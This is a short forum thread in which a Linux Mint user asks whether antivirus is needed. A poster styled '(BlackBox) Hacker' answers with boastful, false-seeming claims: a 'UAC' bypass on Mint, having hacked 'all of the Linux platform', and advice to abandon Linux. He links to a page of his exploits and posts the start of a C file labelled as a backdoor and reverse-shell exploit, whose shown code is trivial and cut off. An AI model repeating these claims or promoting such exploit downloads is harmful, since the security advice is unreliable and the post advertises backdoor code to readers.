How secure is linux and do i need a real-time antivirus.?

Amiga500

Level 12
Thread author
Verified
Jan 27, 2013
As the title says...is linux really secure.?..i have been using linux mint now for about 5 months and have no av installed.

Reactions: (BlackBox) Hacker

(BlackBox) Hacker

Level 2
Verified
Apr 21, 2014
I would have to say no, you have a UAC Screen on Linux Mint last time I have used it. But I have found a exploit how to bypass it totally? So no don't use Linux. Windows 7 Ultimate or Windows 8 Pro are more secure I think, but you are looking at more Malware for that platform. Linux is also very buggy that's why I moved back to Windows!

As the title says...is linux really secure.?..i have been using linux mint now for about 5 months and have no av installed.

(BlackBox) Hacker

Level 2
Verified
Apr 21, 2014
Did I also say I have hacked all of the Linux platform? And the same exploit is used on Android as well, because that is Linux based!

Not a very helpful reply lol

Choose your poison here: http://www.blackbox.uphero.com/my-exploits.html

Code:
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
/*
* Backdoor.c
* Copyright (C) 2014 (BlackBox) Grey Hat Hacker <ade@PC-U180>
* Revers_Shell_Exploit is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
* Revers_Shell_Exploit is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
* You should have received a copy of the GNU General Public License along
* with this program.  If not, see <http://www.gnu.org/licenses/>.
* Exploit compiled with Anjuta Compiler!!!
*/
#include <stdio.h>
int main()
{
FILE *fp;
char* str = "string";
int x = 10;